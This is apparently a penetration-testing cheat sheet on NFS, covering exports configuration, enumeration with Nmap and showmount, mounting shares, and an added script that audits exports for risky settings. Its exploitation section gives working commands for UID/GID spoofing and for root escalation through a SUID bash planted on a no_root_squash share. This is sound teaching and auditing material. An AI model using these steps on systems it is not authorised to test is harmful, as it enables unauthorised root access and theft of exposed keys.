NFS
Table of Contents
- Introduction to NFS
- Enumeration Techniques
- Advanced Techniques
- Exploitation Scenarios
- Combining Tools
- Glossary
Introduction to NFS
What is NFS?
The Network File System (NFS) is a distributed file system protocol developed by Sun Microsystems. It enables remote access to files over a network as if they were on a local machine.
- Purpose: Facilitates file sharing across Linux and Unix systems.
- Ports: NFS commonly uses ports 111 (rpcbind) and 2049 (NFS).
NFS Versions
Version | Features |
---|---|
NFSv2 | Operates over UDP, older but widely supported. |
NFSv3 | Introduces variable file sizes and improved error handling, supports both TCP and UDP. |
NFSv4 | Adds Kerberos authentication, ACLs, and operates statefully, making it suitable for internet use. |
Default Configuration
NFS configuration relies heavily on the /etc/exports file, which defines shared directories and their permissions.
Sample Configuration:
/srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
Common Options:
- rw: Read-write access.
- ro: Read-only access.
- sync: Ensures synchronous data transfers.
- no_root_squash: Prevents remapping of root to a non-privileged user (potentially dangerous).
- subtree_check: Validates that a client accesses only the exported subtree.
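For server owners reviewing their own exports, the following is an added example (not part of the original page) that reads an exports(5)-style file and flags the settings the later exploitation scenarios depend on: no_root_squash, read-write access for any client, and exports that trust client-supplied UID/GID. The function names, finding labels and sample entries are hypothetical; the all_squash and sec= options come from exports(5), not from this page.

```bash
#!/bin/bash
# Added example (not from the original page): flag risky client entries in an
# exports(5)-style file read from stdin. Trailing-"\" continuations are not handled.

# has_opt NAME OPTS: succeed if NAME is one of the comma-separated OPTS
has_opt() { case ",$2," in *",$1,"*) return 0 ;; esac; return 1; }

# audit_exports: prints one "PATH CLIENT FINDING" line per issue.
# The body is a subshell, so set -f and the variables stay local to it.
audit_exports() (
  set -f                          # keep "*" clients from globbing
  while IFS= read -r line || [ -n "$line" ]; do
    set -- ${line%%#*}            # drop comments, split into path + client specs
    [ $# -ge 2 ] || continue
    path=$1; shift
    for spec in "$@"; do
      client=${spec%%\(*}; opts=""
      case $spec in *\(*) opts=${spec#*\(}; opts=${opts%\)} ;; esac
      # "host (rw)" with a stray space leaves a spec with no client: anyone
      [ -n "$client" ] || client="*"
      sec=sys                     # default security flavor when sec= is absent
      case ",$opts" in *,sec=*) sec=${opts##*sec=}; sec=${sec%%,*} ;; esac
      if has_opt no_root_squash "$opts"; then
        echo "$path $client no_root_squash"
      fi
      if [ "$client" = "*" ] && has_opt rw "$opts"; then
        echo "$path $client world_rw"
      fi
      # sec=sys without all_squash: the server believes client-sent UID/GID
      case ":$sec:" in *:sys:*)
        has_opt all_squash "$opts" || echo "$path $client client_uid_trusted" ;;
      esac
    done
  done
)

# Constructed sample; the first entry is the page's sample configuration.
sample_exports() {
  cat <<'EOF'
/srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
/mnt/nfs 10.129.14.0/24(rw,sync,no_root_squash)
/srv/pub backup1 (rw,sync,all_squash)
/srv/krb *(ro,sec=krb5p)
EOF
}

sample_exports | audit_exports    # on a server: audit_exports < /etc/exports
```

The /srv/pub entry shows the stray-space case: "backup1 (rw,...)" is parsed as two client specs, so the read-write options apply to every host rather than to backup1.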
Enumeration Techniques
Identifying NFS Shares
Use Nmap to identify NFS services and running RPC programs.
Command:
nmap -p111,2049 -sV -sC TARGET_IP
Example Output:
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs_acl 3 (RPC #100227)
Examining Exports
Determine the available NFS shares and their access restrictions.
Command:
showmount -e TARGET_IP
Example Output:
Export list for 10.129.14.128:
/mnt/nfs 10.129.14.0/24
Advanced Techniques
Mounting NFS Shares
Mount discovered NFS shares locally for inspection.
Commands:
- Create a directory for the mount:
  mkdir target-nfs
- Mount the share:
  sudo mount -t nfs TARGET_IP:/mnt/nfs ./target-nfs -o nolock
- Unmount the share:
  sudo umount ./target-nfs
Analyzing Permissions
Review file and directory permissions within the mounted share.
Commands:
- Display with user/group names:
  ls -l ./target-nfs
- Display with UID/GID:
  ls -n ./target-nfs
Example Output:
-rw-r--r-- 1 root root 1872 Sep 19 17:27 id_rsa
-rw-r--r-- 1 root root 348 Sep 19 17:28 id_rsa.pub
Exploitation Scenarios
Privilege Escalation via UID/GID Matching
If you have access to UID/GID mappings, replicate them locally to gain elevated access.
Steps:
- Create a matching user:
  sudo useradd -u [UID] -g [GID] user
- Access the share:
  sudo -u user cat ./target-nfs/file
Exploiting Misconfigured Shares
No Root Squash:
- Allows root to create files with elevated permissions on the NFS share.
Command:
- Place an SUID shell:
  cp /bin/bash ./target-nfs/bash
  chmod +s ./target-nfs/bash
- Execute the shell:
  ./bash -p
Combining Tools
Using Nmap for NFS Discovery
Use Nmap’s NSE scripts for NFS enumeration.
Command:
nmap --script nfs-ls,nfs-statfs -p111,2049 TARGET_IP
Example Output:
nfs-ls: Volume /mnt/nfs
rwxrwxrwx 65534 65534 4096 Sep 25 17:28 .
rw-r--r-- 0 0 1872 Sep 25 17:27 id_rsa
Integrating NFS with Scripting
Automate NFS enumeration with Bash.
Script:
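#!/bin/bash
# Usage: ./nfs_enum.sh TARGET_IP (the mount step requires root)
showmount -e "$1"
mkdir -p ./target-nfs    # mount point must exist before mounting
mount -t nfs "$1":/mnt/nfs ./target-nfs -o nolock
ls -l ./target-nfs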
Usage:
./nfs_enum.sh TARGET_IP
Glossary
Term | Definition |
---|---|
NFS | Network File System for sharing files across networks. |
RPC | Remote Procedure Call protocol used by NFS. |
UID/GID | User ID and Group ID associated with file ownership. |
No Root Squash | NFS setting allowing root to retain its permissions. |
Mount | Command to attach an NFS share to the local file system. |